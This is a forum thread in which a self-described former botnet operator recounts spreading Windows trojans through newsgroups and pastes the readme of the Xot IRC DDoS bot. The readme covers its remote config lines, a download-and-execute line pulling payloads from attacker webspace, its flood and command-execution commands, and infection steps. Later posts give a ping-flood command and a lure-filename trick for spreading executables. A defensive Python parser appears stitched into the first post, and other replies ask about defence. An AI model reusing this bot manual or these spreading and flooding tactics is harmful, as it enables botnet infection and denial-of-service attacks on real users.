DDoS - Subseven GT LITMUS and more


Thread: DDoS - Subseven GT LITMUS and more

  1. #1
    acidphreak
    Guest

    DDoS - Subseven GT LITMUS and more

    One day I was on ICQ and one of my friends sent me a file. Being young and ignorant I accepted the file and proceeded to open it, only to notice a funny little error message stating "BOO!". Turns out I opened a backdoor RAT server file my friend made up to have some fun. Later, after learning about RATs and other things of the sort, I enjoyed toying with them. After a long *matter of years* I got into DDoS. I met a person by the handle Zendral, who at the time had a pack of friends known as DrugScare. We quickly became friends and he showed me his botnet of SubSevens. At the time I'd never seen a good botnet, but there were over 130 bots there and I was amazed at what they could do to basically anything he attacked. Later they showed me how they were infecting so many bots.. via newsgroups. I found this to work very well, getting a good amount of bots myself (200). After a while of messing and playing with different crap I learned that the server file size was basically the only thing keeping me from getting a lot of bots. When I discovered a trojan named LITMUS, which a man named DrGreen gave me to further my botnet, I discovered I could infect over 1500 bots in 2 hours of posting and a night for the victims to be infected. This, of course, anyone can imagine is a lot of fire power. I later grew tired of being able to drop any connection that came my way and decided it was time to give it up, so I notified the friendly IRCop on the network where I was keeping the bots and requested him to kill my botnet. He was of course more than happy to do so, knowing that I had so many bots but not knowing where I kept them and begging me daily to rid his server of them. I have in my time tried MANY DDoS Windows trojans, such as GLOBAL THREAT, SUBSEVEN, LITMUS, and many many others... But NONE will ever compare to the one I last used.. It is called XOT, a VERY powerful DDoS program..

    I am going to paste the read me file for XOT at the very end of this so that you can all see the power in this little baby...

    Why? Because it amazes me how much a little 50k file can pack into it...

    DDoS is something I doubt we will ever be rid of, and it is security related, so please no flames; we have enough of them on AO and we don't need more..

    If you do not like my thread then just leave without making a message... if you do like it give me AO points and reply with your own comments ;x


    With no further delay I give you XOT

    Xot v0.5 Beta 2 By: XenoZ

    Well here it is, my first open beta version of my IRC bot Xot. This bot has a ton of goodies for you script kiddies to play with. But let me warn you: Xot is not a friendly channel bot. Xot is an attack bot and can possibly cause a lot of damage if one chose to do so. So basically I'm not to blame if you successfully take down yahoo.com somehow.
    Xot has a main feature which I call DRSS (Dynamic Remote Settings Stub). DRSS is basically important bot settings that are appended at the end of any file you wish to append them to, like a .JPG file or a .GIF file. This file that has the settings is then uploaded to a webspace you specify in EditServer, and when the server.exe file gets executed on the victim's computer, Xot downloads the settings file periodically at a set interval (interval also specified in EditServer) and Xot syncs the settings in. The major benefit of this feature is that you can change the IRC server or channel which your bots idle on _very_ easily. The DRSS file is configured in the format of ircd.conf (if you're not familiar with ircd.conf, it uses different letter lines like O:lines); when you enter the DRSS file maker program, once you type the letter of the line you want it will show the parameters for that line.

    Configuration Lines:

    O-lines:
    O-lines are the lines that add the userinfo for users that use your bot. You can have multiple O-lines, and all parameters for the O-line except for password are allowed to use wildcards.

    Format: O:<host>:<ident>:<nick>:<password>
    Example: O:*.home.com:S*X:Xen*:mindrapist

    I-lines:
    I-lines are the lines that add the botinfo for the IRC server that the bot uses: nickname, username, realname...

    Format: I:<prefix>:<nick>:<ident>:<realname>:<email>:<username>
    Example: I:@:XenBot:Xenny:W3 0wn j00:any@fake.email:Xot

    S-lines:
    S-lines specify the server, server port and password that the bots will idle on. If there is no password leave the 3rd parameter blank but keep the colon.. (for parsing reasons)

    Format: S:<server>:<port>:<password>
    Example: S:irc.lcirc.net:6667:

    C-lines:
    C-lines specify the channel and channel key the bot uses when it connects to the IRC server. If there is no key leave the 2nd parameter blank but keep the colon.. (for parsing reasons)

    Format: C:<channel>:<key>
    Example: C:#mindraperUgScArE

    E-lines:
    Here's a nifty little feature that Overlord_45 gave me the idea for. Why not add client-to-bot encryption to keep those bot stealers and spies away? This line gives the bot encryption for communication. The E-line specifies the encryption key and the name of the DLL file on your webspace which has the encryption routines. (I included a DLL and mIRC script in the project for this feature). Thanks to Overlord_45 for this idea, thanks to say-tan and Quension and the rest of the RCforge crew for the encryption resources, and thanks to Sarin for the script modifications.

    The first parameter is your encryption key and the second parameter is the name of the DLL (submitted in this package) that is in the _SAME_ directory as your DRSS file.

    Format: E:<encryption key>:<DLL name>
    Example: E:MyPersonalKey:Xot.dll

    N-lines:
    N-lines give you the chance to submit a nicklist on your webspace for the bot to download and use to randomly pick a nickname and ident. The file data must have nicknames separated with a comma.. No line breaks! ... Also there is no need to add numbers at the end of nicknames in the nick list, because when the bot randomly chooses a nickname it tacks on a random 2-digit number at the end. The first and only parameter is the name of the nicklist in the _SAME_ webspace directory as your DRSS file. (a sample nicklist has been given in the package)

    Format: N:<name list source NOT A URL>
    Example: N:nicklist.txt

    U-lines:
    U-lines give you the chance to upload and run a program on your bots. This feature is good for updating your bots or just adding a new trojan onto the computer. The first parameter is the URL of the file (you can give it any name, any extension), the second parameter is what you want the file to be renamed to on download (some webspace providers don't accept EXE files, so this feature is for that reason.. give the exe file a JPG extension and the second parameter changes it back on download) and the third parameter is 1 or 0, 1 being run on download and 0 being no run on download...
    WARNING: make sure the file doesn't melt on execution, otherwise the bot will keep downloading it

    Format: U:<url without http>:<filename on computer>:<1 or 0>
    Example: U:my.server.here/server.jpg:server.exe:1

    D-lines:
    D-lines take the startup info out and shut down the bot.


    PASSWORD is password on Server.exe for EditServer.exe


    IRC bot commands: (I'm using "!" as an example prefix)

    !say <channel/user> <text to say> - makes the bot say something
    !op <channel> <user> - makes the bot op someone
    !deop <channel> <user> - makes the bot deop someone
    !ban <channel> <hostmask> - makes the bot ban someone
    !unban <channel> <hostmask> - makes the bot unban someone
    !voice <channel> <user> - makes the bot voice someone
    !devoice <channel> <user> - makes the bot devoice someone
    !notice <channel/user> <text to say> - makes the bot send a notice
    !action <channel/user> <text to say> - makes the bot do an action
    !ctcp <channel/user> <ctcp command> - makes the bot ctcp someone
    !nick <nickname> - makes the bot change its nickname
    !raw <raw IRC command> - makes the bot do a RAW irc command
    !id - makes the bot display its tag
    !sync - makes the bot resync its DRSS file
    !login <password> - logs into the bot
    !exec <hide or show> <commandline> - executes a commandline
    !ping <address> <packetsize> <times> - ICMP attack
    !udp <ip> <packet size> <times> - UDP attack
    !igmp <address> <packetsize> <times> <interval> - IGMP attack
    !clone <server> <port> <# of clones> - clone attack
    !cloneraw <raw IRC command> - send a raw IRC command to the clones
    !clonekill - kills all clones
    !info - gives computer info of the computer that the bot is on
    !botinfo - gives bot version and such

    Encryption -

    This package comes with an mIRC script and a DLL for the encryption routines.. If you want your bot to communicate encrypted, add your E:line with the first parameter as the key and the second parameter as the name of the DLL file... Xot.dll ... then upload the DLL file and upload the new DRSS settings. Then in your mIRC client put Xot.ini and Xot.dll in your mIRC folder and do this in mIRC status... :
    /load -rs Xot.ini
    Then get on your channel and right click the channel window and there should be a Xot submenu.. same thing with queries.

    NOTE: XOT.INI ONLY WORKS WITH mIRC 5.9+

    Editserver.exe -

    This is where we configure the SERVER.exe file to recognize the webspace in which the DRSS file is.

    File Location - the exact website url for your DRSS file

    Interval in Min - the interval between DRSS updates

    Password - password to read EditServer settings

    ID tag - add your own little tag to know whose bots they are, or whatever you want in there.

    No Read - this just means whether, on read, the EditServer should read the already appended info or just append more info. (advanced) Don't use it unless you know what you're doing.


    DRSS Config -

    This is where you make your DRSS file.. you can append it to anything.. but I would use a GIF file because they are small... or you can use a blank txt file... it doesn't matter

    The buttons in DRSS Config are self explanatory.. in the memobox all you have to do is type out the letter of the line you want and the parameters will automatically appear


    Steps On Infection...

    1. configure your Server.exe via Editserver.exe

    2. Make your DRSS file and Upload it to your specified webspace in Editserver

    3. Start infecting


    Other ****-

    Xot Team:

    Programmer: XenoZ
    Head Beta Tester/ideas for Development : Overlord_45
    mIRC Script Creator/ideas/beta tester : Sarin

    I just wanna give shoutouts to everyone at LCIRC (irc.lcirc.net), NetbioM, Overlord_45, Sarin, DataSpy (good luck on your bot), Ritual33, ZenDraL and the rest of the Drugscare Crew (who infected like more than half of the cable IP range =P), RaYmAn (thanks for teaching me the raw UDP.. but I used TNMUDP =P), SilenceGold, Ganja51, narf, CyberFly, evilgoat and slim (good luck on your bots), Gwen and anyone else I missed.


    P.S. This Version Is Dedicated To Rob And Is Released On His Birthday.. Happy Birthday Rob. -XenoZ and NetbioM


    Well that's it for the Beta 2 release...
    Expect more goodies in Beta 3 =D

    -XenoZ

    Thanks for reading this post... If you would like to hear more about DDoS drop me a line: acidburnds@hotmail.com


    Oh, in closing, I made this post to prove that just about anyone can do a good amount of damage over the net with just a little bit of knowledge and a whole lot of spare time ^_^


    WKD *the person who DDoSed www.grc.com* IS THE LAMEST **** ALIVE!!!!! Come on, he hex edited Evil Bot to make it look like he made the trojan that he used to DDoS GRC.com, and his IRC network with his "wkd bots" has the /oper of "/oper wicked realhack". That's right, the l33t hacker's password was "realhack"! -NetBioM
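    The DRSS layout the readme documents (letter-prefixed ircd.conf-style lines appended after the picture data of a GIF or JPEG) is also what an analyst has to recover from a captured settings file. The following is an added example, not code from the post or the Xot package: it carves the text after the GIF trailer or JPEG EOI marker and parses it using the readme's field order, so the rendezvous server, channel and any U-line download URL can be pulled out as indicators; the minimal GIF, hostnames and file names are constructed for the demo.

```python
import re

# Field names per line type, following the readme's "Format:" entries.
DRSS_FIELDS = {
    "O": ["host", "ident", "nick", "password"],
    "I": ["prefix", "nick", "ident", "realname", "email", "username"],
    "S": ["server", "port", "password"],
    "C": ["channel", "key"],
    "E": ["encryption_key", "dll_name"],
    "N": ["nicklist"],
    "U": ["url", "filename", "run_on_download"],
    "D": [],
}
LINE_RE = re.compile(r"^([OISCENUD]):([^\r\n]*)")
# Bytes that end a GIF (trailer) and a JPEG (EOI); viewers ignore what follows.
IMAGE_END = {b"GIF8": b"\x3b", b"\xff\xd8": b"\xff\xd9"}

def trailing_data(blob: bytes) -> bytes:
    """Bytes after the image's end marker, or b'' if nothing DRSS-like follows."""
    for magic, end in IMAGE_END.items():
        if not blob.startswith(magic):
            continue
        # The end byte can also occur inside pixel data: keep scanning until an
        # occurrence is followed by something that parses as a DRSS line.
        pos = blob.find(end)
        while pos != -1:
            rest = blob[pos + len(end):]
            if LINE_RE.match(rest.decode("latin-1").lstrip()):
                return rest
            pos = blob.find(end, pos + 1)
    return b""

def parse_drss(text: str) -> list:
    """Turn DRSS lines into dicts keyed by the readme's field names."""
    records = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # not a configuration line
        kind, rest = m.groups()
        fields = DRSS_FIELDS[kind]
        # Trailing fields may be empty ("S:host:6667:"), so split then pad.
        values = rest.split(":", len(fields) - 1) if fields else []
        values += [""] * (len(fields) - len(values))
        records.append({"type": kind, **dict(zip(fields, values))})
    return records

def parse_drss_file(blob: bytes) -> list:
    """Carve the appended settings out of an image and parse them."""
    return parse_drss(trailing_data(blob).decode("latin-1"))

# Constructed sample: a minimal 1x1 GIF with settings appended after its 0x3B
# trailer, the shape the readme calls a DRSS file (hostnames are made up).
MINIMAL_GIF = (b"GIF89a\x01\x00\x01\x00\x00\x00\x00"
               b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b")
SAMPLE = MINIMAL_GIF + (b"S:irc.example.net:6667:\r\nC:#botchan:\r\n"
                        b"U:files.example.net/x.jpg:update.exe:1\r\nE:key:Xot.dll\r\n")
```

    Running `parse_drss_file(SAMPLE)` yields one dict per line, so the S and C records give the IRC rendezvous to block or watch for and the U record gives the second-stage download host.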

  2. #2
    Senior Member
    Join Date
    Sep 2001
    Posts
    310
    Hey, good post acidphreak, very informative! But I don't think many members of AO will like this post much. Or maybe I'm wrong? Great of you to share your knowledge, but I'm sure you're still not into that script kiddie behavior anymore, are you?
    script language=\"M$cript\";
    function beginError(bsod) {
    return true; }
    onLoad.windows = beginError;

  3. #3
    Senior Member
    Join Date
    Nov 2001
    Posts
    472
    What I would like to know is: is there any cure for these DDoS attacks? I've heard that firewall vendors say they've taken care of the problem, but I've noticed Remote_Access_ said something about how they haven't.

    Anybody know about this? And R_A_, if you read this, can you give me your source?
    ---
    proactive

  4. #4
    Senior Member
    Join Date
    Sep 2001
    Posts
    310
    I don't think it is possible to have a 'cure' for DDoS attacks. Unless you take out the people who conduct the attacks. I've heard about sys admins trying to filter the packets that come through, but the attacker can always change the type they are sending.
    It would be good if there was a cure for it, but I'm afraid it's not that simple.

  5. #5
    acidphreak
    Guest
    Thanks for reading the post ^_^


    No, I have not done DDoS in many months, which, if you ever did do DDoS, you know how addictive it can be. It's more addictive than Diablo 2 LOD, which I stopped playing over a month ago due to having my 1.08 Valor get stolen by some lame script kiddie ;x The armor sold for more than $350 on eBay many times ;x

    But its cool

    Subseven is a lame DDoS bot, trust me on that, but it can be useful for getting RAS to get more DDoS bots, or port-redirect to newsgroups to post more without getting your ISP notified. Its MPING function kills more of your bots than it does the targets. If you want a good ping packet make your own, such as !run ping.exe -n 40 -l 30000 -w 30 VICTEMS-IP. It works much better and kills a lot fewer cable bots.

    Keep the posting going splat <- they're so damn cute ^_^

  6. #6
    Senior Member
    Join Date
    Sep 2001
    Posts
    310
    Hey acidphreak, since you have sufficient experience in DDoS attacks, how do you think they could be prevented? Any 'tips'?
    thanks

  7. #7
    acidphreak
    Guest
    Oh, I forgot!

    As a reply to the cure for DDoS: I've found that I've NEVER had a user on an IRC network survive my big attacks unless they were on a very nice shell v-host. I was able to drop a good amount of eggys easily, but there were always exceptions. I've found that I could keep even dial-up connections down for many hours even if they reconnect. This is what WKD used on www.grc.com, which of course I was totally against. WKD is a lame script kiddie who I have attacked many times; I even found it fun to drop the network he had his EVILBOTS on. Oh! And so you know, WKD never had a massive amount of bots, he had less than 200 bots; the reason it looked like so many is because when Evil Bot is opened more than 1 time, for every extra time it is run it makes a clone of itself. Meaning you could have more than 17 bots running off the same DIAL UP connection. That Evil Bot was one of the worst DDoS bots I have ever seen. The 13 year old packet monkey will grow up one day and hopefully get a job and see the REAL world, 'cause he sure as hell is going some place fast, but it's not any place where non-homosexual men want to be ^_^. A word of advice to WKD: stay the **** away from me or I will get back to DDoS just to kick your little 13 year old ass in your own game.

    -NetBioM


    PLEASE VOTE ON THE POLL! only 1 day left

    irc.icq.com #clubhit nick: NetBioM (to meet me)

  8. #8
    acidphreak
    Guest
    To prevent DDoS my best suggestion is to not download ANYTHING, no matter who the person is or the site it's from, that ends in *.com *.exe *.src

    They are the most commonly used; I personally liked to send it out as src on porn newsgroups and call it something like Sexxxymovie.src. *Yes, I am the same acidphreak that was reported to have 600 subseven bots 2 Christmases ago, known as the "CHRISTMAS DDoS". You can read about that on X-Force's website. Oh yeah, and also I liked to hit kiddie porn fawkers. 11yearoldsister.src ;x Not many people know src files run the same as EXE on most Windows OSes. I have not checked XP but I know it works on all the others besides NT 4.0, which I mainly run other than XP.

    Keep the posting coming, but I have class again; I'll be back to check in around 1 hour.

  9. #9
    PHP/PostgreSQL guy
    Join Date
    Dec 2001
    Posts
    1,164

    very good

    Dude, this is a pretty good post... I was always wondering how DDoS ran on bots and such (being a sysadmin, my worry extends to 1800+ users screwing up the 40+ servers I administer) so this is very educational... You think there's anything that can be written to add in as a "plugin" into the servers, kind of like Return To Castle Wolfenstein's hacked-CD detector/bad name monitoring/team-kill monitoring? See, having someone like yourself who knows how to really break something, you could think of a way to fix it... and if you can't because you're not into programming that much, just let me know and I'll do it

    Very good post once again...this shows the vulnerabilities of machines against DDoS.
    We the willing, led by the unknowing, have been doing the impossible for the ungrateful. We have done so much with so little for so long that we are now qualified to do just about anything with almost nothing.

  10. #10
    acidphreak
    Guest


    Thanks, I was hoping some would enjoy it without flames. I do not program because I mainly don't have the time or patience for it anymore. There are probably many people out there who are able to do such a thing, but most likely the software they make will be something that will cost you a good deal of money, which I do not blame them for doing because we all need the money we can get. My friend XenoZ writes most of the software I use now dealing with trojans and whatnot. Our latest thing was dealing with Diablo 2 LoD, but we won't get into that because that game got lame after everyone had dupes. I mainly work at my school *senior in high school* fixing computers and working on the website. I will tell you basically how to detect DDoS and other such things and even how to find out who is running the DDoS on you, but it does take a lot of time after the attack to figure out who's running the attack on you, even to steal the bots that were run on you. My email is ACIDBURNDS@HOTMAIL.COM; drop me a line and maybe we may have a convo on irc.icq.com (#clubhit) (nick: NetBioM).
